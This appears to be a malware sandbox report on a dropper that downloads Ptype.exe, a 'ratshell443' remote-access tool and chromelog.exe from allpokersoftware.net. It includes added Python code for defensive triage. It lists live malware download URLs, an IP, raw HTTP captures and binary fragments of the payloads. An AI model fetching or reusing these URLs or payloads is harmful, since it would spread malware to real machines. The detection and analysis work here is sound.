%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\NSISdl.dll (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S1YHUDA9\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\uac.dll (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\inetc.dll (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IJE9GDOV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S5KLKDKJ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\nsProcess.dll (4206 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (36 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\Unpack\bfgsetup_s1_l1.exe (2998318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IRCX4XCX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Application Data\BigFishCache\GameManager\log\gamestub_t_install_log.txt (37602 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa4.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bigfishgames[1].txt (318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf7.tmp (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\throttle.txt (2 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Handler" = "%Documents and Settings%\%current user%\Application DataFilename.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
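The removal steps above come down to one persistence point: the "Handler" value in HKCU\Software\Microsoft\Windows\CurrentVersion\Run, which the report shows being written by each of the 24 reg.exe processes and which points at a copy of Ptype.exe (the dropped-files table gives Ptype.exe and "Application DataFilename.exe" the same MD5, e1d7bc3fcbadd4cf8b5a27b5edad90c2). The HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed rewrites listed next to each reg.exe process are the CryptoAPI reseeding its stored seed whenever a process draws random bytes; they need no cleanup. The Python below is an added example of triaging Run values for this pattern; it is not code from the report or from Lavasoft. classify_run_entry() and triage() are pure and run anywhere on the constructed entries, while collect_run_entries() reads the live key through winreg and only works on Windows. The generic value names, the drop-directory list and the three entries other than "Handler" are assumptions; the wscript.exe entry mirrors the dropped aihgmsvmb.vbs but the report does not show how that script is launched.

```python
"""Triage Run-key persistence entries (added example, not from the report).

classify_run_entry()/triage() are pure and run anywhere; collect_run_entries()
reads the live registry through winreg and therefore only works on Windows.
GENERIC_NAMES, DROP_DIRS and SAMPLE_ENTRIES are assumptions for illustration.
"""
import ntpath
import re
import sys

RUN_SUBKEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe", "cmd.exe", "powershell.exe"}
# Value names that name no vendor or product (assumption: worth a look, like "Handler" above).
GENERIC_NAMES = {"handler", "updater", "update", "service", "system", "windows", "load", "run"}
# Per-user directories a dropper can write to without elevation; each tuple is
# the lower-cased tail of a directory path in which an autostart file sits.
DROP_DIRS = [
    ("local settings", "temp"), ("appdata", "local", "temp"),
    ("application data",), ("appdata", "roaming"), ("local settings", "application data"),
]
EXEC_EXT = re.compile(r"\.(exe|com|scr|pif|bat|cmd|vbs|vbe|js|jse|wsf|hta)$", re.I)
ENV_VARS = {"%appdata%": r"c:\users\u\appdata\roaming", "%temp%": r"c:\users\u\appdata\local\temp",
            "%userprofile%": r"c:\users\u", "%localappdata%": r"c:\users\u\appdata\local"}

def split_command(value: str):
    """Split a Run value into (program, [args]). A leading double-quoted token is
    the program; otherwise, like CreateProcess with an unquoted path containing
    spaces, take the shortest token prefix that ends in an executable extension."""
    v = value.strip()
    if v.startswith('"'):
        end = v.find('"', 1)
        return v[1:end], v[end + 1:].split()
    tokens = v.split()
    for i in range(1, len(tokens) + 1):
        candidate = " ".join(tokens[:i])
        if EXEC_EXT.search(candidate):
            return candidate, tokens[i:]
    return (tokens[0] if tokens else ""), tokens[1:]

def path_is_user_drop(path: str) -> bool:
    """True if the file sits directly in a profile root or a per-user temp/appdata directory."""
    p = path.lower().replace("/", "\\")
    for var, real in ENV_VARS.items():
        p = p.replace(var, real)
    comps = [c for c in p.split("\\") if c]
    if len(comps) < 2:
        return False
    dirs = comps[:-1]
    if len(dirs) == 3 and dirs[0].endswith(":") and dirs[1] in ("documents and settings", "users"):
        return True  # C:\Documents and Settings\<user>\x.exe or C:\Users\<user>\x.exe
    return any(tuple(dirs[-len(tail):]) == tail for tail in DROP_DIRS)

def classify_run_entry(name: str, value: str) -> list:
    """Reasons to look at this Run value; an empty list means nothing stood out."""
    program, args = split_command(value)
    reasons = []
    if ntpath.basename(program).lower() in SCRIPT_HOSTS:
        reasons.append(f"autostart through script host {ntpath.basename(program)}")
        program, args = split_command(" ".join(args))  # the real payload is the first argument
    if path_is_user_drop(program):
        reasons.append(f"file sits in a user-writable drop directory: {program}")
    if name.lower() in GENERIC_NAMES:
        reasons.append(f"generic value name {name!r}")
    return reasons

def triage(entries) -> dict:
    """entries: iterable of (name, value); returns {name: reasons} for flagged entries."""
    return {name: reasons for name, value in entries if (reasons := classify_run_entry(name, value))}

def collect_run_entries(hive: str = "HKCU") -> list:
    """Read the live Run key (Windows only; returns [] elsewhere)."""
    if sys.platform != "win32":
        return []
    import winreg
    root = winreg.HKEY_CURRENT_USER if hive == "HKCU" else winreg.HKEY_LOCAL_MACHINE
    entries, index = [], 0
    with winreg.OpenKey(root, RUN_SUBKEY) as key:
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, index)
            except OSError:
                return entries
            entries.append((name, str(value)))
            index += 1

# Constructed sample: the "Handler" entry from the report, a hypothetical
# wscript.exe entry for the dropped aihgmsvmb.vbs, and two benign-looking entries.
SAMPLE_ENTRIES = [
    ("Handler", r"C:\Documents and Settings\alice\Application DataFilename.exe"),
    ("Updater", r'wscript.exe "C:\Documents and Settings\alice\Local Settings\Application Data\aihgmsvmb.vbs"'),
    ("SunJavaUpdateSched", r'"C:\Program Files\Common Files\Java\Java Update\jusched.exe"'),
    ("BigFishGames", r'"C:\Program Files\Big Fish Games\Game Manager\bfgclient.exe" /minimized'),
]

if __name__ == "__main__":
    for name, reasons in triage(collect_run_entries() or SAMPLE_ENTRIES).items():
        print(name, *reasons, sep="\n    ")
```

Run it as a low-privilege user first; the Run keys only need read access, and an entry flagged solely for a generic name is a lead to check against the dropped-files list, not a verdict.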
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 26860 | 27136 | 4.29791 | ab9512ee7c9f5ad72ae20fba64a6341e |
.itext | 32768 | 776 | 1024 | 3.22992 | c79df70a8b89425189a65adf4e08a6b8 |
.data | 36864 | 2040 | 2048 | 0.904367 | 240816d5b34f6e1e38eab9c91fbec05d |
.bss | 40960 | 11172 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 53248 | 2246 | 2560 | 2.90066 | 4b57ef8451a1099532bf2707e4ad39e3 |
.tls | 57344 | 8 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 61440 | 24 | 512 | 0.14174 | 15b26e576cc064822312d1c66bb6f693 |
.reloc | 65536 | 3612 | 4096 | 4.20936 | 92c609bf93bf264697ab3000df42f30f |
.rsrc | 69632 | 243268 | 243712 | 5.30233 | 376efca94063269884d49f0950403f04 |
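The section table above already supports some static triage by hand: every section entropy is below 5.4, so whatever drove the "Entropy: Packed" verdict in the summary, it was not compressed code inside these sections; what stands out instead is that .rsrc accounts for 87% of the file's on-disk section bytes, the shape of an executable that carries its real payload as a resource, and the .itext/.bss/.tls/.idata layout is the one Delphi's linker produces. The Python below is an added example of doing that triage programmatically; it is not part of the Lavasoft report, SECTIONS is transcribed from the table, and the thresholds (75% of bytes in .rsrc, entropy 7.0, a 4x virtual-to-raw growth of a code section) are assumptions.

```python
"""Static triage of a PE section table (added example, not from the report).

SECTIONS is transcribed from the "PE Sections" table above; the thresholds in
triage() are assumptions for illustration, not Lavasoft's or PEiD's rules.
"""
from dataclasses import dataclass

@dataclass(frozen=True)
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    entropy: float

SECTIONS = [
    Section(".text", 4096, 26860, 27136, 4.29791),
    Section(".itext", 32768, 776, 1024, 3.22992),
    Section(".data", 36864, 2040, 2048, 0.904367),
    Section(".bss", 40960, 11172, 0, 0.0),
    Section(".idata", 53248, 2246, 2560, 2.90066),
    Section(".tls", 57344, 8, 0, 0.0),
    Section(".rdata", 61440, 24, 512, 0.14174),
    Section(".reloc", 65536, 3612, 4096, 4.20936),
    Section(".rsrc", 69632, 243268, 243712, 5.30233),
]

# Sections that legitimately have no bytes on disk (zero-initialised data).
UNINITIALISED = {".bss", ".tls"}
CODE_SECTIONS = {".text", ".itext", ".code", "CODE"}

def raw_total(sections) -> int:
    """Bytes the section table accounts for on disk."""
    return sum(s.raw_size for s in sections)

def section_share(sections, name: str) -> float:
    """Fraction of on-disk section bytes held by one section (0.0 if absent)."""
    total = raw_total(sections)
    if not total:
        return 0.0
    return next((s.raw_size / total for s in sections if s.name == name), 0.0)

def triage(sections, payload_share=0.75, high_entropy=7.0, growth=4.0) -> list:
    """Return human-readable findings about the section layout."""
    findings = []
    # 1. One data section carrying most of the file: payload stored as a resource blob.
    share = section_share(sections, ".rsrc")
    if share >= payload_share:
        findings.append(f".rsrc holds {share:.0%} of section bytes: payload likely embedded as a resource")
    for s in sections:
        # 2. Entropy close to 8 bits/byte means compressed or encrypted bytes.
        if s.entropy >= high_entropy:
            findings.append(f"{s.name}: entropy {s.entropy:.2f}, compressed/encrypted data")
        # 3. A code section much larger in memory than on disk is filled at runtime (unpacker stub).
        if s.name in CODE_SECTIONS and s.raw_size and s.virtual_size / s.raw_size >= growth:
            findings.append(f"{s.name}: virtual size {s.virtual_size} vs raw {s.raw_size}, code written at runtime")
        # 4. Raw size 0 is normal for .bss/.tls, not for anything else.
        if s.raw_size == 0 and s.name not in UNINITIALISED:
            findings.append(f"{s.name}: no bytes on disk, materialised at runtime")
    return findings

if __name__ == "__main__":
    for finding in triage(SECTIONS):
        print(finding)
```

Feeding it a table read from a real file with pefile or a similar parser is a one-line change; the point is that the resource-heavy layout, not entropy, is the signal on this sample.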
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://allpokersoftware.net/chromelog.exe | 89.233.106.130 |
hxxp://allpokersoftware.net/Ptype.exe | |
hxxp://allpokersoftware.net/ratshell443.exe | |
hxxp://208.77.152.196/server_time.php | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /Ptype.exe HTTP/1.1
Host: allpokersoftware.net
HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:03:03 GMT
Server: Apache
Last-Modified: Tue, 08 Apr 2014 16:56:32 GMT
Accept-Ranges: bytes
Content-Length: 99328
Connection: close
Content-Type: application/x-msdownload
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m!DS.................z..........N.... ........@.. ....................................@.....................................S.......h............................................................................ ............... ..H............text...Ty... ...z.................. ..`.rsrc...h............|..............@..@.reloc..............................@..B................0.......H.......,d...4......3....9... ..........................................6.(.....o....*...0..!........,..{....,..{....o........(.....*....................0..F........s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....s....o.....o....o.....o....o.....o....o.....o.....o....(....o.....o....r...p"...A...s....o.....o....(....o.....o........(.....o.....o....r ..po.....o.......K..(.....o.....o.....o.....o....r ..po ....o.....o!....o.....o"....o....(....o.....o....r...p"...A...s....o.....o....(....o.....o........(.....o.....o....rO..po.....o.......X..(.....o.....o.....o.....o....rO..po ....o.....o!....o....(....o#....o....r...p"...A...s....o.....o....(....o$....o.....o%....o........(.....o.....o....r}..po.....o.......y..(.....o.....o.....o.....o.....o&....o....(....o'....o....r...p"...A...s....o.....o....(....o.....o........(.....o.....o....r...po.....o.......-..(.....o.....o.....o.....o....r...po(....o.....o&....o....(
<<
<<< skipped >>>
GET /server_time.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.bigfishgames.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: mkt_code=bfgdefault; afsrc=afxxxxxxxxxx; PHPSESSID=5r93onv1a77cmf81855jfbaah2
HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:03:15 GMT
Server: Apache
Vary: X-Client-IP,Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: mkt_code=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=bfgdefault; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=bfgdefault; path=/; domain=.bigfishgames.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 36
Keep-Alive: timeout=15, max=10000
Connection: Keep-Alive
Content-Type: text/html
{"now":1397743395,"12am":1397718000}....
GET /server_time.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.bigfishgames.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: afsrc=afxxxxxxxxxx; mkt_code=bfgdefault; PHPSESSID=5r93onv1a77cmf81855jfbaah2
HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:03:15 GMT
Server: Apache
Vary: X-Client-IP,Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: mkt_code=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=bfgdefault; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.bigfishgames.com
Set-Cookie: mkt_code=bfgdefault; path=/; domain=.big
GET /ratshell443.exe HTTP/1.0
Host: allpokersoftware.net
User-Agent: Python-urllib/1.17
HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:03:08 GMT
Server: Apache
Last-Modified: Wed, 02 Apr 2014 21:24:12 GMT
Accept-Ranges: bytes
Content-Length: 5889983
Connection: close
Content-Type: application/x-msdownload
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}..V...V...V....SU.S..._dG.~..._dV.G...q..._...V...'..._d@.....HNW.W..._dR.W...RichV...................PE..L...m.$N.................>...f......A........P....@...................................Z.........................................d.......^...............................................................@............P...............................text....<.......>.................. ..`.rdata...^...P...`...B..............@..@.data...$4..........................@....rsrc...^...........................@..@..................................................................................................................................................................................................................................................................................................................................................................................................x......A.3...$t...SU..$....V..$....Wj.3.j..\$..@Q..j.j..7Q..j.j...Q..j.j..%Q.... .D$0P.D$......\$..D$ ...... PA.......\$4.\$8.\$<.D$\....f.L$`..N..P.G...P.JK...D$p..N.... P./...P.2K...D$|..N....@P.....P..K.....RA.f...RA...$......RA...$.......RA...$......f..$........T$~....@:.u..|$t .O..O.G:.u...........D$t...P..._I......L$ Q.T$4RSSSj.S.D$0P...PA.PU...PA._^][..t4.L$.j.Q...PA..D$...$RP...PA...$..$t...3...S....x....h.QA........$x......3......S....x......................A.3...$....h.....D$.j.P..S.
<<
<<< skipped >>>
GET /chromelog.exe HTTP/1.1
Host: allpokersoftware.net
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 17 Apr 2014 14:02:57 GMT
Server: Apache
Last-Modified: Mon, 07 Apr 2014 23:52:52 GMT
Accept-Ranges: bytes
Content-Length: 3666664
Connection: close
Content-Type: application/x-msdownload
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}..V...V...V....SU.S..._dG.~..._dV.G...q..._...V...'..._d@.....HNW.W..._dR.W...RichV...................PE..L...m.$N.................>...d......A........P....@.................................h...........................................d.......h...............................................................@............P...............................text....<.......>.................. ..`.rdata...^...P...`...B..............@..@.data...$4..........................@....rsrc...h...........................@..@..................................................................................................................................................................................................................................................................................................................................................................................................x......A.3...$t...SU..$....V..$....Wj.3.j..\$..@Q..j.j..7Q..j.j...Q..j.j..%Q.... .D$0P.D$......\$..D$ ...... PA.......\$4.\$8.\$<.D$\....f.L$`..N..P.G...P.JK...D$p..N.... P./...P.2K...D$|..N....@P.....P..K.....RA.f...RA...$......RA...$.......RA...$......f..$........T$~....@:.u..|$t .O..O.G:.u...........D$t...P..._I......L$ Q.T$4RSSSj.S.D$0P...PA.PU...PA._^][..t4.L$.j.Q...PA..D$...$RP...PA...$..$t...3...S....x....h.QA........$x......3......S....x......................A.3...$....h.....D$.j.P..S.
<<
<<< skipped >>>
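The captures above show three different clients pulling from allpokersoftware.net: the Ptype.exe request carries no User-Agent at all, ratshell443.exe is fetched with Python-urllib/1.17 (the urllib version shipped with Python 2.7, which matches the python27.dll and triple.exe.manifest unpacked into the PyInstaller _MEI4202 directory in the removal list), and chromelog.exe with a bare Keep-Alive request; every one of those responses is application/x-msdownload with an MZ body. The NSIS_Inetc requests to VVV.bigfishgames.com (the report's rendering of www) are the Big Fish installer's own traffic. The Python below is an added example of turning those observations into detection logic over captured exchanges; it is not part of the report and not a Lavasoft or Suricata rule. The watch-list, the user-agent pattern and the MIME list are assumptions, and the sample exchanges are constructed from the captures with the bodies cut to their first bytes.

```python
"""Flag executable downloads in captured HTTP exchanges (added example).

Not Lavasoft's or Suricata's logic. WATCHLIST, SCRIPTED_UA and EXE_MIME are
assumptions; SAMPLES are constructed from the captures above, bodies truncated.
"""
import re
from dataclasses import dataclass

EXE_MIME = {"application/x-msdownload", "application/x-msdos-program", "application/octet-stream"}
SCRIPTED_UA = re.compile(r"^(Python-urllib|NSIS_Inetc|Wget|curl|WinHttp)", re.I)
WATCHLIST = {"allpokersoftware.net"}  # host from the URL table above

@dataclass
class Exchange:
    method: str
    path: str
    req_headers: dict
    status: int
    resp_headers: dict
    body: bytes

def _parse_head(block: bytes):
    """Split 'start line + headers' into (start line, {lower-cased name: value})."""
    lines = block.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def parse_exchange(request: bytes, response: bytes) -> Exchange:
    start, req_headers = _parse_head(request.split(b"\r\n\r\n", 1)[0])
    method, path = start.split(" ")[:2]
    resp_head, _, body = response.partition(b"\r\n\r\n")
    status_line, resp_headers = _parse_head(resp_head)
    return Exchange(method, path, req_headers, int(status_line.split(" ")[1]), resp_headers, body)

def findings(x: Exchange) -> list:
    """Reasons this exchange deserves attention; an empty list means nothing seen."""
    host = x.req_headers.get("host", "").lower()
    ua = x.req_headers.get("user-agent", "")
    ctype = x.resp_headers.get("content-type", "").split(";")[0].strip().lower()
    is_pe = x.status == 200 and x.body.startswith(b"MZ")  # DOS-header magic
    out = []
    if is_pe or ctype in EXE_MIME:
        out.append(f"executable download: {host}{x.path} "
                   f"(Content-Length {x.resp_headers.get('content-length', '?')})")
        if not ua:
            out.append("PE fetched with no User-Agent header")
        elif SCRIPTED_UA.match(ua):
            out.append(f"PE fetched by a non-browser client: {ua}")
    if host in WATCHLIST:
        out.append(f"host on watch-list: {host}")
    return out

def ioc_urls(pairs) -> set:
    """host/path of every (request, response) pair that delivered a PE."""
    urls = set()
    for request, response in pairs:
        x = parse_exchange(request, response)
        if any(f.startswith("executable download") for f in findings(x)):
            urls.add(x.req_headers.get("host", "").lower() + x.path)
    return urls

# Constructed sample data: headers as captured above, bodies cut to the first bytes.
PE_STUB = b"MZ\x90\x00\x03\x00\x00\x00"

def _response(ctype: bytes, length: int, body: bytes) -> bytes:
    return (b"HTTP/1.1 200 OK\r\nServer: Apache\r\nContent-Length: " + str(length).encode()
            + b"\r\nConnection: close\r\nContent-Type: " + ctype + b"\r\n\r\n" + body)

SAMPLES = [
    (b"GET /Ptype.exe HTTP/1.1\r\nHost: allpokersoftware.net\r\n\r\n",
     _response(b"application/x-msdownload", 99328, PE_STUB)),
    (b"GET /ratshell443.exe HTTP/1.0\r\nHost: allpokersoftware.net\r\nUser-Agent: Python-urllib/1.17\r\n\r\n",
     _response(b"application/x-msdownload", 5889983, PE_STUB)),
    (b"GET /server_time.php HTTP/1.1\r\nUser-Agent: NSIS_Inetc (Mozilla)\r\nHost: www.bigfishgames.com\r\n\r\n",
     _response(b"text/html", 36, b'{"now":1397743395,"12am":1397718000}')),
]

def run_samples() -> dict:
    """Map request path -> findings for the constructed exchanges."""
    return {x.path: findings(x) for x in (parse_exchange(q, r) for q, r in SAMPLES)}

if __name__ == "__main__":
    for path, reasons in run_samples().items():
        print(path, reasons or "clean")
```

The user-agent check only fires once the response is already known to be a PE, which is deliberate: NSIS_Inetc and Python-urllib are ordinary installer and script clients, and on this sample the Big Fish installer's NSIS_Inetc requests come back clean.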
Map
Strings from Dumps
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE_1648:
.text
`.rdata
@.data
.ndata
.rsrc
tDSSh
%s %s
... %d%%
verifying installer: %d%%
ADVAPI32.dll
~nsu.tmp\
shlwapi.dll
%u.%u%s%s
KERNEL32.dll
.DEFAULT\Control Panel\International
*?|<>/":
\wininit.ini
%s=%s
%Program Files%
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegDeleteKeyA
RegCloseKey
RegEnumKeyA
RegOpenKeyExA
RegCreateKeyExA
COMCTL32.dll
ole32.dll
VERSION.dll
Au_.exe
RichEd20.dll
"%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /STUBPATH "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe" /D=C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
PLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
\System.dll
Thawte Certification1
http://ocsp.thawte.com0
.http://crl.thawte.com/ThawteTimestampingCA.crl0
http://ts-ocsp.ws.symantec.com07
http://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
2Terms of use at https://www.verisign.com/rpa (c)101.0,
/http://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
https://www.verisign.com/rpa0
http://ocsp.verisign.com0;
/http://csc3-2010-aia.verisign.com/CSC3-2010.cer0
VeriSign Class 3 Public Primary Certification Authority - G50
https://www.verisign.com/cps0*
#http://logo.verisign.com/vslogo.gif04
#http://crl.verisign.com/pca3-g5.crl04
http://ocsp.verisign.com0
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v2.46-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly>
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi2.tmp
nsi2.tmp
%Documents and Settings%\All Users\Application Data\BigFishCache
XR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE
%Documents and Settings%\All Users\Application Data\BigFishCache\Upgrade\stub\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe
"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE"
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..EXE
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
4! # #%%$#
J(.Bu
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v06-Dec-2010.cvs</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly>
3.3.0.2
04090000
04070000
HDPLXR7WNBEV6YCIYU3IR7P9MT7EX72W..exe_1128:
.text
`.rdata
@.data
.ndata
.rsrc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
2 2034383@3
GetProcessHeap
GetCPInfo
nsProcess.dll
;#;7;`;};
KERNEL32.DLL
NTDLL.DLL
Run-Time Check Failure #%d - %s
Kernel32.dll
MSPDB71.DLL
IMAGEHLP.DLL
RegOpenKeyExA
ADVAPI32.DLL
mscoree.dll
Client hook allocation failure at file %hs line %d.
_CrtCheckMemory()
_CrtIsValidHeapPointer(pUserData)
Client hook re-allocation failure at file %hs line %d.
DAMAGE: after %hs block (#%d) at 0x%p.
DAMAGE: before %hs block (#%d) at 0x%p.
%hs allocated at file %hs(%d).
_CrtMemCheckPoint: NULL state pointer.
_CrtMemDifference: NULL state pointer.
crt block at 0x%p, subtype %x, %Iu bytes long.
client block at 0x%p, subtype %x, %Iu bytes long.
%hs(%d) :
#File Error#(%d) :
Data: <%s> %s
- This application cannot run using the active version of the Microsoft .NET Runtime
Please contact the application's support team for more information.
%s(%d) : %s
_CrtDbgReport: String too long or IO Error
Second Chance Assertion Failed: File %s, Line %d
user32.dll
Debug %s!
Program: %s%s%s%s%s%s%s%s%s%s%s
internal state. The program cannot safely continue execution and must
continue execution and must now be terminated.
GetProcessWindowStation
f:\vs70builds\3077\vc\crtbld\crt\src\sprintf.c
f:\vs70builds\307
6q2.EC
.ssXV
)-.Yln
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v2.46-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false" /></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /></application></compatibility></assembly>
verifying installer: %d%%
...
